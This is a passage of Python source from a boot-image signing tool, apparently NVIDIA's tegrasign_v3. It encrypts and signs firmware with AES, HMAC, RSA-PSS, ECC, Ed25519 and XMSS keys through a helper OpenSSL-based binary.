file_size - offset\n    offset = offset if offset > 0 else 0\n\n    length=int(length)\n\n    if file_size < offset:\n        length = 0\n        info_print('Warning: Offset %d is more than file Size %d for %s' % (offset, file_size, filename))\n        return exit_routine()\n\n    if (offset + length) > file_size:\n        info_print('Warning: Offset %d + Length %d is greater than file Size %d for %s' % (offset, length, file_size, filename))\n        return exit_routine()\n\n    if key_index >= MAX_KEY_LIST:\n        info_print('Warning: Key at index %d is not provided ' %(key_index))\n        return exit_routine()\n\n    buff_to_sign = buff_data[offset : offset + length]\n\n    if p_keylist[key_index].mode == NvTegraSign_SBK:\n\n        sbknode = filenode.find('sbk')\n        if sbknode is None:\n            info_print('sbk tag is not present.')\n            return exit_routine()\n\n        skip_enc = 0 if int(sbknode.get('encrypt')) >=1 else 1\n        do_sign = 1 if int(sbknode.get('sign')) >=1 else 0\n        enc_file_name = sbknode.get('encrypt_file')\n        hash_file_name = sbknode.get('hash')\n\n        NumAesBlocks = int(length/AES_128_HASH_BLOCK_LEN)\n        length = int(NumAesBlocks * AES_128_HASH_BLOCK_LEN)\n\n        buff_hash = '0' * AES_128_HASH_BLOCK_LEN\n        buff_enc = bytearray(buff_to_sign)\n\n        if (skip_enc or is_zero_aes(p_keylist[key_index])):\n            info_print('Skipping encryption: ' + filename, True)\n        else:\n            buff_enc = do_aes_cbc(buff_to_sign, length, p_keylist[key_index], iv)\n\n        if do_sign:\n            buff_hash = do_aes_cmac(buff_enc, length, p_keylist[key_index])\n\n        
buff_data = buff_data[0:int(offset)] + buff_enc + buff_data[int(offset) + int(length):]\n\n        # save encryption to *_encrypt.* file\n        enc_fh = open_file(enc_file_name, 'wb')\n        write_file(enc_fh, buff_data)\n        enc_fh.close()\n\n        # save hash to *.hash file\n        hash_fh = open_file(hash_file_name, 'wb')\n        write_file(hash_fh, buff_hash)\n        hash_fh.close()\n\n        perform_sha(filename, filenode.find('sha'))\n\n    elif p_keylist[key_index].mode == NvTegraSign_FSKP:\n\n        sbknode = filenode.find('sbk')\n        if sbknode is None:\n            info_print('sbk tag is not present.')\n            return exit_routine()\n\n        skip_enc = 0 if int(sbknode.get('encrypt')) >=1 else 1\n        do_sign = 1 if int(sbknode.get('sign')) >=1 else 0\n        enc_file_name = sbknode.get('encrypt_file')\n        hash_file_name = sbknode.get('hash')\n\n        NumAesBlocks = int(length/AES_256_HASH_BLOCK_LEN)\n        length = int(NumAesBlocks*AES_256_HASH_BLOCK_LEN)\n\n        buff_hash = \"0\" * AES_256_HASH_BLOCK_LEN\n        buff_enc = bytearray(buff_to_sign)\n\n        if (skip_enc or is_zero_aes(p_keylist[key_index])):\n            info_print('Skipping encryption: ' + filename, True)\n        else:\n            buff_enc = do_aes_cbc(buff_to_sign, length, p_keylist[key_index], iv)\n\n        if do_sign:\n            buff_hash = do_aes_cmac(buff_enc, length, p_keylist[key_index])\n\n        buff_data = buff_data[0:offset] + buff_enc + buff_data[offset + length:]\n\n        # save encryption to *_encrypt.* file\n        enc_fh = open_file(enc_file_name, 'wb')\n        write_file(enc_fh, buff_data)\n        enc_fh.close()\n\n        # save hash to *.hash file\n        hash_fh = open_file(hash_file_name, 'wb')\n        write_file(hash_fh, buff_hash)\n        hash_fh.close()\n\n        perform_sha(filename, filenode.find('sha'))\n\n    elif p_keylist[key_index].mode == NvTegraSign_ECC:\n\n        ecnode = filenode.find('ec')\n        if ecnode is None:\n            info_print('ec tag is not present')\n            return exit_routine()\n\n        sig_file_name = ecnode.get('signature')\n        signed_file_name = ecnode.get('signed_file')\n\n        sig_data = do_ecc(buff_to_sign, length, p_keylist[key_index], pkh, sha_type)\n\n        if sig_file_name:\n            sig_fh = open_file(sig_file_name, 'wb')\n            write_file(sig_fh, sig_data)\n            sig_fh.close()\n        else:\n            info_print('Not saving signature')\n\n        if signed_file_name:\n            signed_fh = open_file(signed_file_name, 'wb')\n            write_file(signed_fh, buff_data)\n            signed_fh.close()\n        else:\n            info_print('Not saving signed file')\n\n    elif p_keylist[key_index].mode == NvTegraSign_ED25519:\n\n        ednode = filenode.find('eddsa')\n\n        if ednode is None:\n            info_print('eddsa tag is not present')\n            return exit_routine()\n\n        sig_file_name = ednode.get('signature')\n        signed_file_name = ednode.get('signed_file')\n\n        sig_data = do_ed25519(buff_to_sign, length, p_keylist[key_index], pkh)\n\n        if sig_file_name:\n            sig_fh = open_file(sig_file_name, 'wb')\n            write_file(sig_fh, sig_data)\n            sig_fh.close()\n        else:\n            info_print('Not saving signature')\n\n        if signed_file_name:\n            signed_fh = open_file(signed_file_name, 'wb')\n            write_file(signed_fh, buff_data)\n            signed_fh.close()\n        else:\n            info_print('Not saving signed file')\n\n    elif p_keylist[key_index].mode == NvTegraSign_XMSS:\n        ednode = filenode.find('xmss')\n\n        if ednode is None:\n            info_print('xmss tag is not present')\n            return exit_routine() # return like the other branches so a missing tag aborts this file\n\n        sig_file_name = ednode.get('signature')\n        signed_file_name = ednode.get('signed_file')\n\n        sig_data = do_xmss(buff_to_sign, p_keylist[key_index], pkh)\n\n        if sig_file_name:\n            sig_fh = open_file(sig_file_name, 'wb')\n            write_file(sig_fh, sig_data)\n            sig_fh.close()\n        else:\n            info_print('Not saving signature')\n\n        if signed_file_name:\n            signed_fh = open_file(signed_file_name, 'wb')\n            write_file(signed_fh, 
buff_data)\n signed_fh.close()\n else:\n info_print('Not saving signed file')\n\n else:\n\n pkcnode = filenode.find('pkc')\n if pkcnode is None:\n info_print('pkc tag is not present')\n return exit_routine()\n\n sig_file_name = pkcnode.get('signature')\n signed_file_name = pkcnode.get('signed_file')\n sig_data = do_rsa_pss(buff_to_sign, length, p_keylist[key_index], pkh, mont, sha_type)\n\n if sig_file_name:\n sig_fh = open_file(sig_file_name, 'wb')\n write_file(sig_fh, sig_data)\n sig_fh.close()\n else:\n info_print('Not saving signature')\n\n if signed_file_name:\n signed_fh = open_file(signed_file_name, 'wb')\n write_file(signed_fh, buff_data)\n signed_fh.close()\n else:\n info_print('Not saving signed file')\n return 0\n\n\ndef sign_files_in_list(p_keylist, internal):\n filelistname = internal[\"--list\"]\n pkh, _, _= get_pkh_args(internal)\n mont = internal[\"--getmontgomeryvalues\"]\n iv = internal[\"--iv\"]\n sha_type = internal[\"--sha\"]\n\n try:\n tree = ElementTree.parse(filelistname)\n\n except IOError:\n info_print('Cannot parse %s as a XML file' %(filelistname))\n return exit_routine()\n\n root = tree.getroot()\n\n for child in root:\n retVal = sign_files_internal(p_keylist, child, pkh, mont, sha_type, iv)\n if retVal != 0:\n return retVal\n\n # Add mode info\n root.set('mode', get_mode_str(p_keylist[0], False))\n\n # Prepend the following to the xml content\n comment = '\\n\\n\\n'\n if(isPython3()):\n xml_str = comment + ElementTree.tostring(root, encoding='unicode')\n else:\n xml_str = comment + ElementTree.tostring(root)\n\n # Generate *_signed.xml\n xml_fh = open_file(filelistname.replace('.xml', '_signed.xml'), 'w')\n write_file(xml_fh, xml_str)\n xml_fh.close()\n return 0\n\n\ndef sign_single_file(p_key, internal):\n filename = internal[\"--file\"]\n offset = internal[\"--offset\"]\n length = internal[\"--length\"]\n enc_type = internal[\"--enc\"]\n sign_type = internal[\"--sign\"]\n pkh, _, _ = get_pkh_args(internal)\n mont = internal[\"--getmontgomeryvalues\"]\n iv = internal[\"--iv\"]\n aad = internal[\"--aad\"]\n tag = internal[\"--tag\"]\n verify = internal[\"--verify\"]\n sha512 = internal[\"--sha\"]\n verbose = internal[\"--verbose\"]\n\n with open(filename, 'rb') as f:\n buff_data = bytearray(f.read())\n file_size = len(buff_data)\n\n offset = offset if offset > 0 else 0\n length = length if length > 0 else file_size - offset\n\n if file_size < offset:\n length = 0\n info_print('Warning: Offset %d is more than file Size %d for %s' % (offset, file_size, filename))\n return exit_routine()\n\n if (offset + length) > file_size:\n info_print('Warning: Offset %d + Length %d is greater than file Size %d for %s' % (offset, length, file_size, filename))\n return exit_routine()\n\n buff_to_sign = buff_data[offset : offset + length]\n\n if p_key.mode == NvTegraSign_SBK:\n\n NumAesBlocks = int(length / AES_128_HASH_BLOCK_LEN)\n length = int(NumAesBlocks * AES_128_HASH_BLOCK_LEN)\n\n buff_hash = \"0\" * AES_128_HASH_BLOCK_LEN\n buff_enc = bytearray(buff_to_sign)\n is_hash = False\n\n if ((enc_type == None or enc_type == 'None') or is_zero_aes(p_key)):\n info_print('Skipping encryption: ' + filename, True)\n elif (enc_type == 'aescbc'):\n buff_enc = do_aes_cbc(buff_to_sign, length, p_key, iv)\n elif (enc_type == 'aesgcm'):\n buff_enc = do_aes_gcm(buff_to_sign, length, p_key, iv, aad, tag, verify, verbose)\n tag_file_name = os.path.splitext(filename)[0] + '.tag'\n with open(tag_file_name, 'wb') as f:\n f.write(p_key.kdf.tag.get_hexbuf())\n\n if sign_type == 'hmacsha256':\n 
buff_hash = do_hmac_sha256(buff_enc, length, p_key)\n is_hash = True\n elif enc_type != 'aesgcm': # cmac is not for aesgcm\n buff_hash = do_aes_cmac(buff_enc, length, p_key)\n is_hash = True\n\n buff_data = buff_data[0:offset] + buff_enc + buff_data[offset + length:]\n\n # save encryption to *_encrypt.* file\n enc_file_name = os.path.splitext(filename)[0] + '_encrypt' + os.path.splitext(filename)[1] # ie. rcm_0_encrypt.rcm\n enc_fh = open_file(enc_file_name, 'wb')\n write_file(enc_fh, buff_data)\n enc_fh.close()\n\n if is_hash == True:\n # save hash to *.hash file\n hash_file_name = os.path.splitext(filename)[0] + '.hash'\n hash_fh = open_file(hash_file_name, 'wb')\n write_file(hash_fh, buff_hash)\n hash_fh.close()\n\n elif p_key.mode == NvTegraSign_FSKP:\n\n NumAesBlocks = int(length/AES_256_HASH_BLOCK_LEN)\n length = int(NumAesBlocks*AES_256_HASH_BLOCK_LEN)\n\n buff_hash = \"0\" * AES_256_HASH_BLOCK_LEN\n buff_enc = bytearray(buff_to_sign)\n is_hash = False\n\n if not is_hsm() and ((enc_type == None or enc_type == 'None') or is_zero_aes(p_key)):\n info_print('Skipping encryption: ' + filename, True)\n elif (enc_type == 'aescbc'):\n buff_enc = do_aes_cbc(buff_to_sign, length, p_key, iv)\n elif (enc_type == 'aesgcm'):\n buff_enc = do_aes_gcm(buff_to_sign, length, p_key, iv, aad, tag, verify, verbose)\n tag_file_name = os.path.splitext(filename)[0] + '.tag'\n with open(tag_file_name, 'wb') as f:\n f.write(p_key.kdf.tag.get_hexbuf())\n\n if sign_type == 'hmacsha256':\n buff_hash = do_hmac_sha256(buff_enc, length, p_key)\n is_hash = True\n elif enc_type != 'aesgcm': # cmac is not for aesgcm\n buff_hash = do_aes_cmac(buff_enc, length, p_key)\n is_hash = True\n\n buff_data = buff_data[0:offset] + buff_enc + buff_data[offset + length:]\n\n # save encryption to *_encrypt.* file\n enc_file_name = os.path.splitext(filename)[0] + '_encrypt' + os.path.splitext(filename)[1] # ie. 
rcm_0_encrypt.rcm\n enc_fh = open_file(enc_file_name, 'wb')\n write_file(enc_fh, buff_data)\n enc_fh.close()\n\n if is_hash == True:\n # save hash to *.hash file\n hash_file_name = os.path.splitext(filename)[0] + '.hash'\n hash_fh = open_file(hash_file_name, 'wb')\n write_file(hash_fh, buff_hash)\n hash_fh.close()\n\n elif p_key.mode == NvTegraSign_ECC:\n\n sig_data = do_ecc(buff_to_sign, length, p_key, pkh, sha512)\n\n sig_file_name = os.path.splitext(filename)[0] + '.sig'\n sig_fh = open_file(sig_file_name, 'wb')\n write_file(sig_fh, sig_data)\n sig_fh.close()\n\n elif p_key.mode == NvTegraSign_ED25519:\n\n sig_data = do_ed25519(buff_to_sign, length, p_key, pkh)\n sig_file_name = os.path.splitext(filename)[0] + '.sig'\n sig_fh = open_file(sig_file_name, 'wb')\n write_file(sig_fh, sig_data)\n sig_fh.close()\n\n elif p_key.mode == NvTegraSign_XMSS:\n sig_data = do_xmss(buff_to_sign, p_key, pkh)\n sig_file_name = os.path.splitext(filename)[0] + '.sig'\n sig_fh = open_file(sig_file_name, 'wb')\n write_file(sig_fh, sig_data)\n sig_fh.close()\n\n else:\n\n sig_data = do_rsa_pss(buff_to_sign, length, p_key, pkh, mont, sha512)\n sig_file_name = os.path.splitext(filename)[0] + '.sig'\n sig_fh = open_file(sig_file_name, 'wb')\n write_file(sig_fh, sig_data)\n sig_fh.close()\n return 0\n\ndef do_aes_cmac(buff_to_sign, length, p_key):\n buff_sig = \"0\" * 16 # note cmac will always return 128bit\n\n base_name = script_dir + 'v3_cmac_' + pid\n raw_name = base_name + '.raw'\n result_name = base_name + '.out'\n raw_file = open_file(raw_name, 'wb')\n\n key_bytes = len(binascii.hexlify(p_key.key.aeskey))/2\n keysize_bytes = int_2byte_cnt(p_key.keysize)\n len_bytes = int_2byte_cnt(length)\n sign_bytes = len(buff_to_sign)\n sig_bytes = len(buff_sig)\n result_bytes = len(result_name) + 1\n\n # to write to file\n # order: sizes then data for: key, keysize, length, buff_to_sign, buff_sig, result_name\n num_list = [key_bytes, keysize_bytes, len_bytes, sign_bytes, sig_bytes, result_bytes]\n for num in num_list:\n arr = int_2bytes(4, num)\n write_file(raw_file, arr)\n\n write_file(raw_file, p_key.key.aeskey) #aeskey already in byte array format\n arr = int_2bytes(keysize_bytes, p_key.keysize)\n write_file(raw_file, arr)\n arr = int_2bytes(len_bytes, length)\n write_file(raw_file, arr)\n\n write_file(raw_file, bytes(buff_to_sign))\n\n write_file(raw_file, buff_sig.encode(\"utf-8\"))\n write_file(raw_file, result_name.encode(\"utf-8\"))\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n write_file(raw_file, nullarr)\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--aescmac', raw_name])\n\n ret_str = run_command(command)\n\n if check_file(result_name):\n result_fh = open_file(result_name, 'rb')\n buff_sig = result_fh.read()\n result_fh.close()\n os.remove(result_name)\n\n os.remove(raw_name)\n return buff_sig\n\ndef do_hmac_sha256(buff_to_sign, length, p_key):\n buff_dgst = \"0\" * 32 # note hmac-sha256 will always return 256bit\n\n if is_hsm():\n from tegrasign_v3_hsm import do_hmac_sha256_hsm\n return do_hmac_sha256_hsm(buff_to_sign, p_key)\n\n base_name = script_dir + 'v3_hmacsha_' + pid\n raw_name = base_name + '.raw'\n result_name = base_name + '.out'\n raw_file = open_file(raw_name, 'wb')\n\n key_bytes = len(binascii.hexlify(p_key.key.aeskey))/2\n keysize_bytes = int_2byte_cnt(p_key.keysize)\n len_bytes = int_2byte_cnt(length)\n hash_bytes = len(buff_to_sign)\n dgst_bytes = len(buff_dgst)\n result_bytes = len(result_name) + 1\n\n # to write to file\n # order: 
sizes then data for: key, keysize, length, buff_to_sign, buff_dgst, result_name\n num_list = [key_bytes, keysize_bytes, len_bytes, hash_bytes, dgst_bytes, result_bytes]\n for num in num_list:\n arr = int_2bytes(4, num)\n write_file(raw_file, arr)\n\n write_file(raw_file, p_key.key.aeskey) #aeskey already in byte array format\n arr = int_2bytes(keysize_bytes, p_key.keysize)\n write_file(raw_file, arr)\n arr = int_2bytes(len_bytes, length)\n write_file(raw_file, arr)\n\n write_file(raw_file, bytes(buff_to_sign))\n write_file(raw_file, buff_dgst.encode(\"utf-8\"))\n write_file(raw_file, result_name.encode(\"utf-8\"))\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n write_file(raw_file, nullarr)\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--hmacsha256', raw_name])\n\n ret_str = run_command(command)\n\n if check_file(result_name):\n result_fh = open_file(result_name, 'rb')\n buff_dgst = result_fh.read()\n result_fh.close()\n os.remove(result_name)\n\n os.remove(raw_name)\n return buff_dgst\n\ndef do_aes_cbc(buff_to_enc, length, p_key, iv):\n\n buff_sig = \"0\" * 16\n base_name = script_dir + 'v3_cbc_' + pid\n raw_name = base_name + '.raw'\n result_name = base_name + '.out'\n raw_file = open_file(raw_name, 'wb')\n\n key_bytes = len(binascii.hexlify(p_key.key.aeskey))/2\n keysize_bytes = int_2byte_cnt(p_key.keysize)\n len_bytes = int_2byte_cnt(length)\n enc_bytes = len(buff_to_enc)\n dest_bytes = int(length)\n result_bytes = len(result_name) + 1\n buff_dest = \"0\" * dest_bytes\n if (type(iv) == str) or (type(iv) == bytearray):\n iv_bytes = len(binascii.hexlify(iv))/2\n else:\n iv_bytes = 0;\n\n # to write to file\n # order: sizes then data for: key, keysize, length, buff_to_enc, buff_dest, result_name, iv\n num_list = [key_bytes, keysize_bytes, len_bytes, enc_bytes, dest_bytes, result_bytes, iv_bytes]\n for num in num_list:\n arr = int_2bytes(4, num)\n write_file(raw_file, arr)\n\n write_file(raw_file, p_key.key.aeskey)\n arr = int_2bytes(keysize_bytes, p_key.keysize)\n write_file(raw_file, arr)\n arr = int_2bytes(len_bytes, length)\n write_file(raw_file, arr)\n\n write_file(raw_file, bytes(buff_to_enc))\n\n write_file(raw_file, buff_dest.encode(\"utf-8\"))\n write_file(raw_file, result_name.encode(\"utf-8\"))\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n write_file(raw_file, nullarr)\n if (iv != None):\n write_file(raw_file, bytes(iv))\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--aescbc', raw_name])\n\n ret_str = run_command(command)\n\n if check_file(result_name):\n result_fh = open_file(result_name, 'rb')\n buff_sig = result_fh.read()\n result_fh.close()\n os.remove(result_name)\n\n os.remove(raw_name)\n return buff_sig\n\ndef do_rsa_pss(buff_to_sign, length, p_key, pkhfile, montfile, sha512):\n p_key.key.pkckey.Sha = sha512\n if is_hsm():\n from tegrasign_v3_hsm import do_rsa_pss_hsm\n return do_rsa_pss_hsm(buff_to_sign, p_key)\n\n buff_sig = \"0\" * p_key.keysize\n base_name = script_dir + 'v3_rsa_' + pid\n raw_name = base_name + '.raw'\n result_name = base_name + '.out'\n\n raw_file = open_file(raw_name, 'wb')\n\n filename_bytes = len(p_key.filename) + 1 # to account for 0x0\n len_bytes = int_2byte_cnt(length)\n sign_bytes = len(buff_to_sign)\n sig_bytes = len(buff_sig)\n pkh_bytes = 0 if pkhfile == None else (len(pkhfile) + 1)\n mont_bytes = 0 if montfile == None else (len(montfile) + 1)\n result_bytes = len(result_name) + 1\n\n # order: sizes then data for: file name, length, 
buff_to_sign, buff_sig, pkhfile, montfile, result_name, sha512\n num_list = [filename_bytes, len_bytes, sign_bytes, sig_bytes, pkh_bytes, mont_bytes, result_bytes, sha512]\n for num in num_list:\n arr = int_2bytes(4, num)\n write_file(raw_file, arr)\n\n write_file(raw_file, bytes(p_key.filename.encode(\"utf-8\")))\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n\n write_file(raw_file, nullarr)\n arr = int_2bytes(len_bytes, length)\n write_file(raw_file, arr)\n\n write_file(raw_file, buff_to_sign)\n write_file(raw_file, bytes(buff_sig.encode(\"utf-8\")))\n\n if (pkh_bytes > 0):\n write_file(raw_file, bytes(pkhfile.encode(\"utf-8\")))\n write_file(raw_file, nullarr)\n\n if (mont_bytes > 0):\n write_file(raw_file, bytes(montfile.encode(\"utf-8\")))\n write_file(raw_file, nullarr)\n\n write_file(raw_file, bytes(result_name.encode(\"utf-8\")))\n write_file(raw_file, nullarr)\n\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--rsa', raw_name])\n\n ret_str = run_command(command)\n\n if check_file(result_name):\n result_fh = open_file(result_name, 'rb')\n buff_sig = result_fh.read()\n result_fh.close()\n os.remove(result_name)\n\n os.remove(raw_name)\n return buff_sig\n\ndef do_ecc(buff_to_sign, length, p_key, pkhfile, sha512):\n\n buff_sig = \"0\" * p_key.keysize\n\n base_name = script_dir + 'v3_ecc_' + pid\n raw_name = base_name + '.raw'\n result_name = base_name + '.out'\n raw_file = open_file(raw_name, 'wb')\n\n filename_bytes = len(p_key.filename) + 1 # to account for 0x0\n len_bytes = int_2byte_cnt(length)\n sign_bytes = len(buff_to_sign)\n sig_bytes = len(buff_sig)\n pkh_bytes = 0 if pkhfile == None else (len(pkhfile) + 1)\n result_bytes = len(result_name) + 1\n\n # order: sizes then data for: file name, length, buff_to_sign, buff_sig, pkhfile, result_name, sha512\n num_list = [filename_bytes, len_bytes, sign_bytes, sig_bytes, pkh_bytes, result_bytes, sha512]\n for num in num_list:\n arr = int_2bytes(4, num)\n write_file(raw_file, arr)\n\n write_file(raw_file, bytes(p_key.filename.encode(\"utf-8\")))\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n write_file(raw_file, nullarr)\n\n arr = int_2bytes(len_bytes, length)\n write_file(raw_file, arr)\n\n write_file(raw_file, buff_to_sign)\n write_file(raw_file, bytes(buff_sig.encode(\"utf-8\")))\n\n if (pkh_bytes > 0):\n write_file(raw_file, bytes(pkhfile.encode(\"utf-8\")))\n write_file(raw_file, nullarr)\n\n write_file(raw_file, bytes(result_name.encode(\"utf-8\")))\n write_file(raw_file, nullarr)\n\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--ecc', raw_name])\n\n ret_str = run_command(command)\n\n if check_file(result_name):\n result_fh = open_file(result_name, 'rb')\n buff_sig = result_fh.read()\n result_fh.close()\n os.remove(result_name)\n\n os.remove(raw_name)\n return buff_sig\n\ndef do_ed25519(buff_to_sign, length, p_key, pkhfile):\n\n if is_hsm():\n from tegrasign_v3_hsm import do_ed25519_hsm\n return do_ed25519_hsm(buff_to_sign, p_key)\n\n buff_sig = \"0\" * p_key.keysize\n\n base_name = script_dir + 'v3_eddsa_' + pid\n raw_name = base_name + '.raw'\n result_name = base_name + '.out'\n raw_file = open_file(raw_name, 'wb')\n\n filename_bytes = len(p_key.filename) + 1 # to account for 0x0\n len_bytes = int_2byte_cnt(length)\n sign_bytes = len(buff_to_sign)\n sig_bytes = len(buff_sig)\n pkh_bytes = 0 if pkhfile == None else (len(pkhfile) + 1)\n result_bytes = len(result_name) + 1\n\n # order: sizes then data for: file name, length, 
buff_to_sign, buff_sig, pkhfile, result_name\n    num_list = [filename_bytes, len_bytes, sign_bytes, sig_bytes, pkh_bytes, result_bytes]\n    for num in num_list:\n        arr = int_2bytes(4, num)\n        write_file(raw_file, arr)\n\n    write_file(raw_file, bytes(p_key.filename.encode(\"utf-8\")))\n    nullarr = bytearray(1)\n    nullarr[0] = 0 # need this null for char*\n    write_file(raw_file, nullarr)\n\n    arr = int_2bytes(len_bytes, length)\n    write_file(raw_file, arr)\n\n    write_file(raw_file, buff_to_sign)\n    write_file(raw_file, bytes(buff_sig.encode(\"utf-8\")))\n\n    if (pkh_bytes > 0):\n        write_file(raw_file, bytes(pkhfile.encode(\"utf-8\")))\n        write_file(raw_file, nullarr)\n\n    write_file(raw_file, bytes(result_name.encode(\"utf-8\")))\n    write_file(raw_file, nullarr)\n\n    raw_file.close()\n\n    command = exec_file(TegraOpenssl)\n    command.extend(['--ed25519', raw_name])\n\n    ret_str = run_command(command)\n\n    if check_file(result_name):\n        result_fh = open_file(result_name, 'rb')\n        buff_sig = result_fh.read()\n        result_fh.close()\n        os.remove(result_name)\n\n    os.remove(raw_name)\n    return buff_sig\n\ndef do_xmss(buff_to_sign, p_key, pkh):\n    # public key file name is xmss-sha256_20.pub\n    raw_name = script_dir + 'v3_xmss_' + pid + '.raw'\n    buff_sig = None # fallback return value if no signature file is produced\n\n    key_file = p_key.filename\n    cache_file = key_file + '.cache'\n    pub_file = os.path.splitext(os.path.basename(key_file))[0] + '.pub'\n    result_name = raw_name + '.sig'\n    xmss_exe = 'xmss-sign'\n\n    if (check_file(xmss_exe) == False):\n        raise tegrasign_exception('Cannot find %s for signing' % (xmss_exe))\n\n    # If any of the three files does not exist, invoke the tool to regenerate the key pair\n    if (check_file(cache_file) == False or check_file(key_file) == False\n        or check_file(pub_file) == False):\n        info_print('Regenerating XMSS key pair')\n        if (check_file(cache_file) == True):\n            os.remove(cache_file)\n        if (check_file(key_file) == True):\n            os.remove(key_file)\n        if (check_file(pub_file) == True):\n            os.remove(pub_file)\n        # Invoke cmd to regenerate: ./xmss-sign generate --privkey private-key --pubkey public-key\n        command = exec_file(xmss_exe)\n        command.extend(['generate --privkey ' + key_file + ' --pubkey ' + pub_file])\n        ret_str = run_command(command)\n    status = os.stat(key_file)\n    mask = oct(status.st_mode)[-3:]\n\n    if (status.st_mode & stat.S_IWOTH) or (status.st_mode & stat.S_IXOTH) or (status.st_mode & stat.S_IROTH):\n        info_print(key_file + ' file mode needs to be modified, mask: ' + mask)\n        new_mode = stat.S_IMODE(os.lstat(key_file).st_mode)\n        new_mode = new_mode & 0o770 # get rid of other mode, so resulting in: o=\n        try:\n            os.chmod(key_file, new_mode)\n            info_print('Changed the mode to: ' + oct(new_mode)[-3:])\n        except Exception as e:\n            info_print('Hit exception when changing the mode: ' + oct(new_mode)[-3:] + str(e))\n    with open_file(raw_name, 'wb') as raw_file:\n        write_file(raw_file, bytes(buff_to_sign))\n\n    if pkh:\n        shutil.copyfile(pub_file, pkh)\n\n    # Generate the signature in file named '$raw_name'.sig\n    command = exec_file(xmss_exe)\n    command.extend(['sign'])\n    command.extend(['-f', raw_name])\n    command.extend(['--privkey', key_file])\n    command.extend(['-o', result_name])\n    ret_str = run_command(command)\n\n    if check_file(result_name):\n        with open_file(result_name, 'rb') as result_fh:\n            buff_sig = result_fh.read()\n        os.remove(result_name)\n    return buff_sig\n\ndef do_sha(sha_cnt, filename, offset, length, blockSize):\n\n    sha_fh = open_file(filename, 'rb')\n    buff_data = sha_fh.read()\n    sha_fh.close()\n\n    file_size = len(buff_data)\n    length = length if length 
> 0 else file_size - offset\n offset = offset if offset > 0 else 0\n\n if file_size < offset:\n length = 0\n info_print('Warning: Offset %d is more than file Size %d for %s' % (offset, file_size, filename))\n return exit_routine()\n\n if (offset + length) > file_size:\n info_print('Warning: Offset %d + Length %d is greater than file Size %d for %s' % (offset, length, file_size, filename))\n return exit_routine()\n\n buff_to_hash = buff_data[offset : offset + length]\n buff_hash = \"0\" * int(sha_cnt)\n len_bytes = int_2byte_cnt(length)\n base_name = script_dir + 'v3_' + os.path.splitext(os.path.basename(filename))[0] + '_' + pid\n hash_file_name = os.path.splitext(filename)[0] + '.sha'\n hash_file_bytes = len(hash_file_name) + 1\n\n # to write to raw file\n raw_name = base_name + '.raw'\n raw_file = open_file(raw_name, 'wb')\n\n # order: sizes then data for: length, buff_to_hash, buff_hash, hash_file_name\n num_list = [len_bytes, length, sha_cnt, hash_file_bytes]\n for num in num_list:\n arr = int_2bytes(4, num)\n write_file(raw_file, arr)\n\n arr = int_2bytes(len_bytes, length)\n write_file(raw_file, arr)\n\n write_file(raw_file, bytes(buff_to_hash))\n write_file(raw_file, bytes(buff_hash.encode(\"utf-8\")))\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n write_file(raw_file, bytes(hash_file_name.encode(\"utf-8\")))\n write_file(raw_file, nullarr)\n\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--sha', raw_name])\n if blockSize != \"0\":\n command.extend(['--block', blockSize])\n\n ret_str = run_command(command)\n if check_file(hash_file_name):\n info_print('Sha saved in ' + hash_file_name)\n\n os.remove(raw_name)\n return hash_file_name\n\ndef extract_AES_key(pBuffer, p_key):\n\n # Process the content as binary format\n if not b'0' in pBuffer:\n byte_cnt = len(pBuffer)\n\n if byte_cnt == 16:\n p_key.keysize = byte_cnt\n p_key.key.aeskey = pBuffer\n p_key.mode = NvTegraSign_SBK\n info_print('Key is a SBK key')\n info_print('Key Size is 16 bytes')\n return 1\n\n elif byte_cnt == 32:\n p_key.keysize = byte_cnt\n p_key.key.aeskey = pBuffer\n p_key.mode = NvTegraSign_FSKP\n info_print('Key Size is 32 bytes')\n return 1\n else:\n info_print('Not an AES key', True)\n return 0\n\n try:\n # Process the content as string format\n list_of_elements = [ (number).replace(\"0x\", \"\") for number in pBuffer[:].decode().replace(\"\\n\", \" \").split(\" \") ]\n\n key_str = list_of_elements[0]\n\n for element in list_of_elements[1:]:\n key_str = key_str + element\n\n key_str_length = len(key_str.strip())\n if key_str_length == 32:\n p_key.mode = NvTegraSign_SBK\n info_print('Key is a SBK key')\n info_print('Key Size is 16 bytes')\n\n elif key_str_length == 64:\n p_key.mode = NvTegraSign_FSKP\n info_print('Key Size is 32 bytes')\n\n else:\n info_print('Not an AES key', True)\n return 0\n\n key = str_to_hex(key_str)\n\n p_key.keysize = int(key_str_length/2)\n\n p_key.key.aeskey = bytearray(key)\n\n return 1\n\n except UnicodeDecodeError:\n # key format is in a binary sequence\n byte_cnt = len(pBuffer)\n\n if byte_cnt == 16:\n p_key.keysize = byte_cnt\n p_key.key.aeskey = pBuffer\n p_key.mode = NvTegraSign_SBK\n info_print('Key is a SBK key')\n info_print('Key Size is 16 bytes')\n return 1\n\n elif byte_cnt == 32:\n p_key.keysize = byte_cnt\n p_key.key.aeskey = pBuffer\n p_key.mode = NvTegraSign_FSKP\n info_print('Key Size is 32 bytes')\n return 1\n info_print('Not an AES key', True)\n return 0\n\ndef is_PKC_key(keyfilename, p_key, pkh, mont):\n\n command 
